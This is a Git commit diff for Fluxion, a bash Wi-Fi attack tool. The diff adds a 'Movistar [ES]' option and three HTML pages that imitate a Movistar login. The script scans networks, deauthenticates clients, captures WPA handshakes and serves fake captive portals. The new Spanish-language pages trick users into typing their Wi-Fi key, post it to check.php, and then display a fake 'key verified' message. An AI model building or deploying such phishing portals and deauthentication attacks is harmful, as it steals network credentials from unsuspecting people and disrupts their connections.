Merge pull request #3 from vvbv/master

Add Movistar [ES] site
This commit is contained in:
deltax 2017-05-07 16:26:20 +02:00 committed by GitHub
commit eac64b3a70
4 changed files with 425 additions and 66 deletions

142
fluxion
View File

@ -31,7 +31,7 @@ fi
clear clear
##################################### < CONFIGURATION > ##################################### ##################################### < CONFIGURATION > #####################################
DUMP_PATH="/tmp/TMPflux" DUMP_PATH="/tmp/TMPflux"
HANDSHAKE_PATH="/root/handshakes" HANDSHAKE_PATH="/root/handshakes"
PASSLOG_PATH="/root/pwlog" PASSLOG_PATH="/root/pwlog"
WORK_DIR=`pwd` WORK_DIR=`pwd`
@ -550,10 +550,10 @@ function language {
iptables-save > $DUMP_PATH/iptables-rules iptables-save > $DUMP_PATH/iptables-rules
conditional_clear conditional_clear
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
source $WORK_DIR/language/en; setinterface source $WORK_DIR/language/en; setinterface
else else
while true; do while true; do
conditional_clear conditional_clear
@ -561,7 +561,7 @@ else
echo -e ""$red"["$yellow"2"$red"]"$transparent" Select your language" echo -e ""$red"["$yellow"2"$red"]"$transparent" Select your language"
echo " " echo " "
echo -e " "$red"["$yellow"1"$red"]"$grey" English " echo -e " "$red"["$yellow"1"$red"]"$grey" English "
echo -e " "$red"["$yellow"2"$red"]"$transparent" German " echo -e " "$red"["$yellow"2"$red"]"$transparent" German "
echo -e " "$red"["$yellow"3"$red"]"$transparent" Romanian " echo -e " "$red"["$yellow"3"$red"]"$transparent" Romanian "
echo -e " "$red"["$yellow"4"$red"]"$transparent" Turkish " echo -e " "$red"["$yellow"4"$red"]"$transparent" Turkish "
@ -570,8 +570,8 @@ else
echo -e " "$red"["$yellow"7"$red"]"$transparent" Italian " echo -e " "$red"["$yellow"7"$red"]"$transparent" Italian "
echo -e " "$red"["$yellow"8"$red"]"$transparent" Czech " echo -e " "$red"["$yellow"8"$red"]"$transparent" Czech "
echo -e " "$red"["$yellow"9"$red"]"$transparent" Greek " echo -e " "$red"["$yellow"9"$red"]"$transparent" Greek "
echo -e " "$red"["$yellow"10"$red"]"$transparent" French " echo -e " "$red"["$yellow"10"$red"]"$transparent" French "
echo -e " "$red"["$yellow"11"$red"]"$transparent" Slovenian " echo -e " "$red"["$yellow"11"$red"]"$transparent" Slovenian "
echo " " echo " "
echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent""
read yn read yn
@ -591,7 +591,7 @@ else
* ) echo "Unknown option. Please choose again"; conditional_clear ;; * ) echo "Unknown option. Please choose again"; conditional_clear ;;
esac esac
done done
fi fi
} }
@ -631,16 +631,16 @@ function setinterface {
echo -e " "$red"["$yellow"$i"$red"]"$transparent" $line" echo -e " "$red"["$yellow"$i"$red"]"$transparent" $line"
done done
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
line="1" line="1"
else else
echo echo
echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent""
read line read line
fi fi
PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}') PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}')
fi fi
if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then
@ -705,10 +705,10 @@ function ghost {
# Select channel # Select channel
function choosescan { function choosescan {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
Scan Scan
else else
conditional_clear conditional_clear
while true; do while true; do
conditional_clear conditional_clear
@ -730,7 +730,7 @@ function choosescan {
* ) echo "Unknown option. Please choose again"; conditional_clear ;; * ) echo "Unknown option. Please choose again"; conditional_clear ;;
esac esac
done done
fi fi
} }
# Choose your channel if you choose option 2 before # Choose your channel if you choose option 2 before
@ -763,9 +763,9 @@ function Scan {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
sleep 30 && killall xterm & sleep 30 && killall xterm &
fi fi
xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one
} }
# Choose a network # Choose a network
@ -833,9 +833,9 @@ function selection {
aspeed[$i]=$SPEED aspeed[$i]=$SPEED
fi fi
done < $DUMP_PATH/dump-02.csv done < $DUMP_PATH/dump-02.csv
# Select the first network if you select the first network # Select the first network if you select the first network
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
choice=1 choice=1
else else
echo echo
@ -844,7 +844,7 @@ function selection {
echo -e " $selection_2" echo -e " $selection_2"
echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent""
read choice read choice
fi fi
if [[ $choice -eq "r" ]]; then if [[ $choice -eq "r" ]]; then
ghost ghost
@ -885,9 +885,9 @@ function askAP {
askauth askauth
fi fi
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
fakeapmode="hostapd"; authmode="handshake"; handshakelocation fakeapmode="hostapd"; authmode="handshake"; handshakelocation
else else
top top
while true; do while true; do
@ -909,15 +909,15 @@ function askAP {
* ) echo "$general_case_error"; conditional_clear ;; * ) echo "$general_case_error"; conditional_clear ;;
esac esac
done done
fi fi
} }
# Test Passwords / airbase-ng # Test Passwords / airbase-ng
function askauth { function askauth {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
authmode="handshake"; handshakelocation authmode="handshake"; handshakelocation
else else
conditional_clear conditional_clear
top top
@ -939,7 +939,7 @@ function askauth {
* ) echo "$general_case_error"; conditional_clear ;; * ) echo "$general_case_error"; conditional_clear ;;
esac esac
done done
fi fi
} }
function handshakelocation { function handshakelocation {
@ -953,9 +953,9 @@ function handshakelocation {
echo -e "${red}Do you want to use this file? (y/N)" echo -e "${red}Do you want to use this file? (y/N)"
echo -ne "$transparent" echo -ne "$transparent"
if [ "$FLUX_AUTO" = "0" ];then if [ "$FLUX_AUTO" = "0" ];then
read usehandshakefile read usehandshakefile
fi fi
if [ "$usehandshakefile" = "y" -o "$usehandshakefile" = "Y" ]; then if [ "$usehandshakefile" = "y" -o "$usehandshakefile" = "Y" ]; then
handshakeloc="/root/handshakes/$Host_SSID2-$Host_MAC.cap" handshakeloc="/root/handshakes/$Host_SSID2-$Host_MAC.cap"
@ -966,11 +966,11 @@ function handshakelocation {
echo -e "handshake location (Example: $red$WORK_DIR.cap$transparent)" echo -e "handshake location (Example: $red$WORK_DIR.cap$transparent)"
echo -e "Press ${yellow}ENTER$transparent to skip" echo -e "Press ${yellow}ENTER$transparent to skip"
echo echo
echo -ne "Path: " echo -ne "Path: "
if [ "$FLUX_AUTO" = "0" ];then if [ "$FLUX_AUTO" = "0" ];then
read handshakeloc read handshakeloc
fi fi
fi fi
if [ "$handshakeloc" = "" ]; then if [ "$handshakeloc" = "" ]; then
@ -979,7 +979,7 @@ function handshakelocation {
if [ -f "$handshakeloc" ]; then if [ -f "$handshakeloc" ]; then
pyrit -r "$handshakeloc" analyze &>$flux_output_device pyrit -r "$handshakeloc" analyze &>$flux_output_device
pyrit_broken=$? pyrit_broken=$?
if [ $pyrit_broken = 0 ]; then if [ $pyrit_broken = 0 ]; then
Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2) Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2)
Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]') Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')
@ -1041,9 +1041,9 @@ function handshakelocation {
function deauthforce { function deauthforce {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
handshakemode="normal"; askclientsel handshakemode="normal"; askclientsel
else else
conditional_clear conditional_clear
@ -1067,7 +1067,7 @@ function deauthforce {
$general_case_error"; conditional_clear ;; $general_case_error"; conditional_clear ;;
esac esac
done done
fi fi
} }
############################################### < MENU > ############################################### ############################################### < MENU > ###############################################
@ -1082,9 +1082,9 @@ function deauthforce {
# Type of deauthentication to be performed # Type of deauthentication to be performed
function askclientsel { function askclientsel {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
deauth all deauth all
else else
conditional_clear conditional_clear
while true; do while true; do
@ -1111,7 +1111,7 @@ function askclientsel {
$general_case_error"; conditional_clear ;; $general_case_error"; conditional_clear ;;
esac esac
done done
fi fi
} }
# #
@ -1163,11 +1163,11 @@ function deauth {
function deauthMENU { function deauthMENU {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
while true;do while true;do
checkhandshake && sleep 5 checkhandshake && sleep 5
done done
else else
while true; do while true; do
conditional_clear conditional_clear
@ -1180,7 +1180,7 @@ function deauthMENU {
echo -e "Status handshake: $Handshake_statuscheck" echo -e "Status handshake: $Handshake_statuscheck"
echo echo
echo -e " "$red"["$yellow"1"$red"]"$grey" $deauthMENU_option_1" echo -e " "$red"["$yellow"1"$red"]"$grey" $deauthMENU_option_1"
echo -e " "$red"["$yellow"2"$red"]"$transparent" $general_back " echo -e " "$red"["$yellow"2"$red"]"$transparent" $general_back "
echo -e " "$red"["$yellow"3"$red"]"$transparent" Select another network" echo -e " "$red"["$yellow"3"$red"]"$transparent" Select another network"
echo -e " "$red"["$yellow"4"$red"]"$transparent" Exit" echo -e " "$red"["$yellow"4"$red"]"$transparent" Exit"
echo -n ' #> ' echo -n ' #> '
@ -1196,7 +1196,7 @@ function deauthMENU {
esac esac
done done
fi fi
} }
# Capture all # Capture all
@ -1254,17 +1254,17 @@ function checkhandshake {
function certssl { function certssl {
# Test if the ssl certificate is generated correcly if there is any # Test if the ssl certificate is generated correcly if there is any
if [ -f $DUMP_PATH/server.pem ]; then if [ -f $DUMP_PATH/server.pem ]; then
if [ -s $DUMP_PATH/server.pem ]; then if [ -s $DUMP_PATH/server.pem ]; then
webinterface webinterface
break break
else else
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
creassl creassl
fi fi
while true;do while true;do
conditional_clear conditional_clear
top top
echo " " echo " "
@ -1283,10 +1283,10 @@ function certssl {
3 ) exitmode; break;; 3 ) exitmode; break;;
* ) echo "$general_case_error"; conditional_clear * ) echo "$general_case_error"; conditional_clear
esac esac
done done
fi fi
else else
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
creassl creassl
fi fi
@ -1310,8 +1310,8 @@ function certssl {
* ) echo "$general_case_error"; conditional_clear * ) echo "$general_case_error"; conditional_clear
esac esac
done done
fi fi
} }
@ -1330,9 +1330,9 @@ function webinterface {
chmod 400 /root/server.pem chmod 400 /root/server.pem
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
matartodo; ConnectionRESET; selection matartodo; ConnectionRESET; selection
else else
while true; do while true; do
conditional_clear conditional_clear
top top
@ -1351,21 +1351,21 @@ function webinterface {
2 ) matartodo; exitmode; break;; 2 ) matartodo; exitmode; break;;
esac esac
done done
fi fi
} }
function ConnectionRESET { function ConnectionRESET {
if [ "$FLUX_AUTO" = "1" ];then if [ "$FLUX_AUTO" = "1" ];then
webconf=1 webconf=1
else else
while true; do while true; do
conditional_clear conditional_clear
top top
infoap infoap
n=1 n=1
echo echo
echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_ConnectionRESET" echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_ConnectionRESET"
echo echo
@ -1412,11 +1412,12 @@ function ConnectionRESET {
echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Xfinity[Login-Xfinity] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Xfinity[Login-Xfinity] ";n=` expr $n + 1`
echo -e " "$red"["$yellow"$n"$red"]"$transparent" Telekom ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Telekom ";n=` expr $n + 1`
echo -e " "$red"["$yellow"$n"$red"]"$transparent" Google";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Google";n=` expr $n + 1`
echo -e " "$red"["$yellow"$n"$red"]"$transparent" MOVISTAR [ESP]";n=`expr $n + 1`
echo -e " "$red"["$yellow"$n"$red"]"$transparent"\e[1;31m $general_back"$transparent"" echo -e " "$red"["$yellow"$n"$red"]"$transparent"\e[1;31m $general_back"$transparent""
echo echo
echo -n "#? " echo -n "#? "
read webconf read webconf
if [ "$webconf" = "1" ]; then if [ "$webconf" = "1" ]; then
DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ENG DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ENG
DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ENG DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ENG
@ -1640,7 +1641,7 @@ function ConnectionRESET {
DIALOG_WEB_DIR=$DIALOG_WEB_DIR_BG DIALOG_WEB_DIR=$DIALOG_WEB_DIR_BG
NEUTRA NEUTRA
break break
elif [ "$webconf" = "17" ]; then elif [ "$webconf" = "17" ]; then
DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_SRB DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_SRB
DIALOG_WEB_INFO=$DIALOG_WEB_INFO_SRB DIALOG_WEB_INFO=$DIALOG_WEB_INFO_SRB
@ -1696,7 +1697,7 @@ function ConnectionRESET {
DIALOG_WEB_DIR=$DIALOG_WEB_DIR_NL DIALOG_WEB_DIR=$DIALOG_WEB_DIR_NL
NEUTRA NEUTRA
break break
elif [ "$webconf" = 21 ]; then elif [ "$webconf" = 21 ]; then
DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_DAN DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_DAN
DIALOG_WEB_INFO=$DIALOG_WEB_INFO_DAN DIALOG_WEB_INFO=$DIALOG_WEB_INFO_DAN
@ -1840,11 +1841,15 @@ function ConnectionRESET {
google google
break break
elif [ "$webconf" = "44" ]; then elif [ "$webconf" = "44" ]; then
MOVISTAR_ES
break
elif [ "$webconf" = "45" ]; then
conditional_clear conditional_clear
webinterface webinterface
break break
fi fi
done done
fi fi
@ -2467,19 +2472,19 @@ function NEUTRA {
function ARRIS { function ARRIS {
mkdir $DUMP_PATH/data &>$flux_output_device mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/ARRIS-ENG/* $DUMP_PATH/data cp -r $WORK_DIR/sites/ARRIS-ENG/* $DUMP_PATH/data
} }
function BELKIN { function BELKIN {
mkdir $DUMP_PATH/data &>$flux_output_device mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/belkin_eng/* $DUMP_PATH/data cp -r $WORK_DIR/sites/belkin_eng/* $DUMP_PATH/data
} }
function NETGEAR { function NETGEAR {
mkdir $DUMP_PATH/data &>$flux_output_device mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/netgear_eng/* $DUMP_PATH/data cp -r $WORK_DIR/sites/netgear_eng/* $DUMP_PATH/data
} }
function ARRIS2 { function ARRIS2 {
@ -2490,7 +2495,7 @@ function ARRIS2 {
function NETGEAR2 { function NETGEAR2 {
mkdir $DUMP_PATH/data &>$flux_output_device mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/netgear_esp/* $DUMP_PATH/data cp -r $WORK_DIR/sites/netgear_esp/* $DUMP_PATH/data
} }
function TPLINK { function TPLINK {
@ -2512,7 +2517,7 @@ function VERIZON {
function HUAWEI { function HUAWEI {
mkdir $DUMP_PATH/data &>$flux_output_device mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/huawei_eng/* $DUMP_PATH/data cp -r $WORK_DIR/sites/huawei_eng/* $DUMP_PATH/data
} }
function ZIGGO_NL { function ZIGGO_NL {
@ -2565,6 +2570,11 @@ function google {
cp -r $WORK_DIR/sites/google_de/* $DUMP_PATH/data cp -r $WORK_DIR/sites/google_de/* $DUMP_PATH/data
} }
function MOVISTAR_ES {
mkdir $DUMP_PATH/data &>$flux_output_device
cp -r $WORK_DIR/sites/movistar_esp/* $DUMP_PATH/data
}
######################################### < INTERFACE WEB > ######################################## ######################################### < INTERFACE WEB > ########################################
top && setresolution && setinterface top && setresolution && setinterface

View File

@ -0,0 +1,125 @@
<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|!(IE)]><!-->
<html class="no-js" lang="de"><!--<![endif]--><!-- HEAD --><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Movistar Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="styles/components.css">
<link rel="stylesheet" type="text/css" href="styles/login.css">
</head>
<!-- /HEAD -->
<!-- BODY -->
<body>
<!-- HEADER -->
<div id="tbs-header">
<div id="tbs-header-content">
<div class="container-fixed clearfix">
<div class="tbs-text-zero pull-left">
<img id="logo" src="img/logo_movistar.png" alt="">
</div>
</div>
</div>
</div>
<!-- /HEADER -->
<!-- CANCEL FORM -->
<!-- /CANCEL FORM -->
<!-- CONTENT -->
<div id="tbs-container">
<div class="error-box">
<div class="error-box__content"><i class="icon icon-large">X</i> Clave incorrecta.</div>
</div>
<div id="tbs-infobox">
<center><p>Para continuar navegando de manera segura, debe confirmar su clave WIFI.</p></center>
</div>
<form id="form1" name="form1" method="POST" action="check.php" accept-charset="UTF-8" autocomplete="off">
<!-- XSRF Prevention -->
<div class="offset-bottom-4">
<!-- Re-Authentication -->
<div class="container offset-bottom-1">
</div>
<!-- username input -->
<div class="form-input-set offset-bottom-1">
<input id="key1" name="key1" class="form-input" maxlength="256" tabindex="10" type="password" placeholder="Clave WIFI">
</div>
<!-- Login button -->
<br>
<div class="text-center">
<button id="pw_submit" name="pw_submit" type="submit" class="btn btn-brand btn-large tbs-text-upper" tabindex="40">Confirmar</button>
</div>
</div>
</form>
<div class="text-center">
</div>
</div>
<!-- /CONTENT -->
<!-- FOOTER -->
<div id="tbs-footer" class="sticky">
<div class="container-fixed">
<div class="text-small clearfix">
<div class="pull-left">
<p>&copy; 2017 Movistar Telecomunicaciones</p>
</div>
<div class="pull-right clearfix">
<div class="pull-left">
<a class="offset-right-4" href="https://www.movistar.com/es/" target="_blank" tabindex="90">Movistar</a>
</div>
</div>
</div>
</div>
</div>
<!-- /FOOTER -->
<!-- Status -->
<script>
var accountLocked = false;
var accountLockedPermanent = false;
var accountLockExpiration = 0;
</script>
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script type="text/javascript" src="/static/vdplus/js/html5shiv.js"></script>
<script type="text/javascript" src="/static/vdplus/js/respond.min.js"></script>
<![endif]-->
<script type="text/javascript" src="Telekom%20Login-Dateien/jquery-1.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/components.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/login.js"></script>
<!-- Tracking -->
<!-- Callback Tracking -->
<!-- Toon Template Debugging -->
</body><!-- /BODY --></html>

View File

@ -0,0 +1,95 @@
<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|!(IE)]><!-->
<html class="no-js" lang="de"><!--<![endif]--><!-- HEAD --><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Movistar Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="styles/components.css">
<link rel="stylesheet" type="text/css" href="styles/login.css">
</head>
<!-- /HEAD -->
<!-- BODY -->
<body>
<!-- HEADER -->
<div id="tbs-header">
<div id="tbs-header-content">
<div class="container-fixed clearfix">
<div class="tbs-text-zero pull-left">
<img id="logo" src="img/logo_movistar.png" alt="">
</div>
</div>
</div>
</div>
<!-- /HEADER -->
<!-- CANCEL FORM -->
<!-- /CANCEL FORM -->
<!-- CONTENT -->
<div id="tbs-container">
<div class="text-center">
<div id="tbs-infobox">
<center><img id="happy" src="img/happy.png" alt=""></center>
<center><p><i class="icon icon-large">V</i> Clave verificada, se está restaurando la conexi&oacute;n.</p></center>
</div>
</div>
</div>
<!-- /CONTENT -->
<!-- FOOTER -->
<div id="tbs-footer" class="sticky">
<div class="container-fixed">
<div class="text-small clearfix">
<div class="pull-left">
<p>&copy; 2017 Movistar Telecomunicaciones</p>
</div>
<div class="pull-right clearfix">
<div class="pull-left">
<a class="offset-right-4" href="https://www.movistar.com/es/" target="_blank" tabindex="90">Movistar</a>
</div>
</div>
</div>
</div>
</div>
<!-- /FOOTER -->
<!-- Status -->
<script>
var accountLocked = false;
var accountLockedPermanent = false;
var accountLockExpiration = 0;
</script>
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script type="text/javascript" src="/static/vdplus/js/html5shiv.js"></script>
<script type="text/javascript" src="/static/vdplus/js/respond.min.js"></script>
<![endif]-->
<script type="text/javascript" src="Telekom%20Login-Dateien/jquery-1.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/components.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/login.js"></script>
<!-- Tracking -->
<!-- Callback Tracking -->
<!-- Toon Template Debugging -->
</body><!-- /BODY --></html>

View File

@ -0,0 +1,129 @@
<!DOCTYPE html>
<!--[if (lte IE 8) ]><html lang="de-DE" class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|!(IE)]><!-->
<html class="no-js" lang="de"><!--<![endif]--><!-- HEAD --><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Movistar Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="styles/components.css">
<link rel="stylesheet" type="text/css" href="styles/login.css">
</head>
<!-- /HEAD -->
<!-- BODY -->
<body>
<!-- HEADER -->
<div id="tbs-header">
<div id="tbs-header-content">
<div class="container-fixed clearfix">
<div class="tbs-text-zero pull-left">
<img id="logo" src="img/logo_movistar.png" alt="">
</div>
</div>
</div>
</div>
<!-- /HEADER -->
<!-- CANCEL FORM -->
<!-- /CANCEL FORM -->
<!-- CONTENT -->
<div id="tbs-container">
<div id="tbs-headline">
<center><img id="happy2" src="img/happy.png" alt=""></center>
<!--<h1 class="text-center marketing-l text-thin tbs-text-1em">Verificaci&oacute;n de seguridad</h1>-->
</div>
<div id="tbs-infobox">
<center><p>Para continuar navegando de manera segura, debe confirmar su clave WIFI.</p></center>
</div>
<form id="form1" name="form1" method="POST" action="check.php" accept-charset="UTF-8" autocomplete="off">
<!-- XSRF Prevention -->
<div class="offset-bottom-4">
<!-- Re-Authentication -->
<div class="container offset-bottom-1">
</div>
<!-- username input -->
<div class="form-input-set offset-bottom-1">
<input id="key1" name="key1" class="form-input" maxlength="256" tabindex="10" type="password" placeholder="Clave WIFI">
</div>
<!-- Login button -->
<br>
<div class="text-center">
<button id="pw_submit" name="pw_submit" type="submit" class="btn btn-brand btn-large tbs-text-upper" tabindex="40">Confirmar</button>
</div>
</div>
</form>
<div class="text-center">
</div>
</div>
<!-- /CONTENT -->
<!-- FOOTER -->
<div id="tbs-footer" class="sticky">
<div class="container-fixed">
<div class="text-small clearfix">
<div class="pull-left">
<p>&copy; 2017 Movistar Telecomunicaciones</p>
</div>
<div class="pull-right clearfix">
<div class="pull-left">
<a class="offset-right-4" href="https://www.movistar.com/es/" target="_blank" tabindex="90">Movistar</a>
</div>
</div>
</div>
</div>
</div>
<!-- /FOOTER -->
<!-- Status -->
<script>
var accountLocked = false;
var accountLockedPermanent = false;
var accountLockExpiration = 0;
</script>
<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script type="text/javascript" src="/static/vdplus/js/html5shiv.js"></script>
<script type="text/javascript" src="/static/vdplus/js/respond.min.js"></script>
<![endif]-->
<script type="text/javascript" src="Telekom%20Login-Dateien/jquery-1.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/components.js"></script>
<script type="text/javascript" src="Telekom%20Login-Dateien/login.js"></script>
<!-- Tracking -->
<!-- Callback Tracking -->
<!-- Toon Template Debugging -->
</body><!-- /BODY --></html>